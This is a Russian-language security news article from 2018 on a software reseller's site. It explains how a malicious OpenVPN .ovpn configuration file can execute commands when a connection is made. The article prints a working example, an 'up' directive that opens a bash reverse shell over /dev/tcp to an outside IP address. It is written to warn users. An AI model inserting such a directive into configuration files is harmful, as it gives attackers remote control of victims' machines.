Перейти к содержанию
100043, г.Ташкент, Чиланзар Е, 9.+998 71 2031999info@starlab.uzПон – Пят 09:00 – 18:00
Facebook page opens in new windowInstagram page opens in new windowYouTube page opens in new windowTelegram page opens in new window
FAQ
Войти
Лицензионные программы
Лицензионных программ
Лицензионные программы
  • Главная
  • Новости
  • Программы
    • Антивирусы ESET NOD32 для дома
    • Антивирусы ESET NOD32 для Бизнеса
    • Dr.Web
    • Kaspersky
    • Продукты Microsoft
    • CloudLinux
    • Plesk
    • cPanel & WHM
    • WHMCS Addons
  • Скачать
    • Скачать база антивируса ESET NOD32
    • Kaspersky
  • О компании
  • Контакты
0 сўм0

В корзинуОформить

  • Нет товаров в корзине.

Итого: 0 сўм

В корзинуОформить

Поиск:
  • Главная
  • Новости
  • Программы
    • Антивирусы ESET NOD32 для дома
    • Антивирусы ESET NOD32 для Бизнеса
    • Dr.Web
    • Kaspersky
    • Продукты Microsoft
    • CloudLinux
    • Plesk
    • cPanel & WHM
    • WHMCS Addons
  • Скачать
    • Скачать база антивируса ESET NOD32
    • Kaspersky
  • О компании
  • Контакты

Файлы конфигурации клиента OpenVPN могут использоваться для установки бэкдоров

Июн222018
Новости

Файлы конфигурации клиента OpenVPN могут использоваться для установки бэкдоров

Атакующий может превратить безопасный конфигурационный файл во вредоносный, добавив всего несколько строк кода.

Специалисты в области кибербезопасности неоднократно предупреждали о рисках загрузки контента из непроверенных источников, поскольку многие из таких файлов могут содержать вредоносный код, нежелательное рекламное ПО или скрипты, осуществляющие вредоносную деятельность на компьютере. Исследователь Джейкоб Бэйнс (Jacob Baines) продемонстрировал, как простой конфигурационный файл (.ovpn) клиента OpenVPN может использоваться для выполнения команд на компьютере после установки VPN-соединения.

Согласно Бэйнсу, для превращения безопасного конфигурационного файла во вредоносный злоумышленникам потребуется всего лишь добавить несколько строк кода. В примере исследователя, конфигурационный файл имеет следующий вид:

remote 192.168.1.245 ifconfig 10.200.0.2 10.200.0.1 dev tun

Если злоумышленнику требуется выполнить команду, он может добавить строку script-security 2 (разрешает OpenVPN выполнять пользовательские скрипты) и запись «up», содержащую команду, которая выполнится после установки соединения.

remote 192.168.1.245 ifconfig 10.200.0.2 10.200.0.1 dev tun script-security 2 up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”

Таким образом атакующий получит возможность удаленно выполнить команды на компьютере с запущенным файлом конфигурации OpenVPN.

По словам эксперта, данный метод также может использоваться для атак на пользователей компьютеров под управлением Windows с помощью скрипта PowerShell. Более подробно метод атаки описан здесь .

Хотя Бэйнс пока не сталкивался со случаями применения описанного им метода, специалист призвал с осторожностью относиться к недоверенным ovpn файлам или использовать такие OpenVPN-клиенты, как Viscosity, снижающие риск подобных атак.

OpenVPN — свободная реализация технологии виртуальной частной сети (VPN) с открытым исходным кодом для создания зашифрованных каналов типа точка-точка или сервер-клиенты между компьютерами. Она позволяет устанавливать соединения между компьютерами, находящимися за NAT и сетевым экраном, без необходимости изменения их настроек.

Рубрика: Новости22.06.2018
Поделиться этой записью
Поделиться в FacebookПоделиться в Facebook ТвитнутьПоделиться в Twitter Pin itПоделиться в Pinterest Поделиться в LinkedInПоделиться в LinkedIn Поделиться в WhatsAppПоделиться в WhatsApp

Навигация по записям

ПредыдущаяПредыдущая запись:В контроллерах от Rockwell Automation исправлена уязвимостьСледующаяСледующая запись:В 2019 году могут появиться цифровые ключи для автомобилей

Похожие новости

21 СОВЕТ И РЕКОМЕНДАЦИИ ПО КИБЕРБЕЗОПАСНОСТИ ДЛЯ ВАШЕГО БИЗНЕСА
21 СОВЕТ И РЕКОМЕНДАЦИИ ПО КИБЕРБЕЗОПАСНОСТИ ДЛЯ ВАШЕГО БИЗНЕСА
27.05.2022
Windows 11 Домашняя. Приближает вас к тому, что вы любите
Windows 11 Домашняя. Приближает вас к тому, что вы любите
27.05.2022
Пиратский Windows 11 хакерская ловушка для распространения вредоносного ПО Vidar
Пиратский Windows 11 хакерская ловушка для распространения вредоносного ПО Vidar
26.05.2022
Троян Vidar который крадет данные
Троян Vidar который крадет данные
23.05.2022
Крах криптовалюты: крах стейблкоина приводит к падению токенов
Крах криптовалюты: крах стейблкоина приводит к падению токенов
18.05.2022
Microsoft выпускает исправление для нового нулевого дня с обновлениями вторника исправлений за май 2022 г.
Microsoft выпускает исправление для нового нулевого дня с обновлениями вторника исправлений за май 2022 г.
18.05.2022
Лицензионные программы

Copyright 2016 - 2022 © Theme Created By Starlab All Rights Reserved.
ООО Starlab, Адрес: 100043, г.Ташкент, Чиланзар Е, дом 9. ИНН: 304 426 154, ОКЭД: 58210,
Р/с: 20208000300691615001, АКБ "ТУРОН" банк Чиланзарский ф-л. МФО: 01084.
Принимаем: Способ оплаты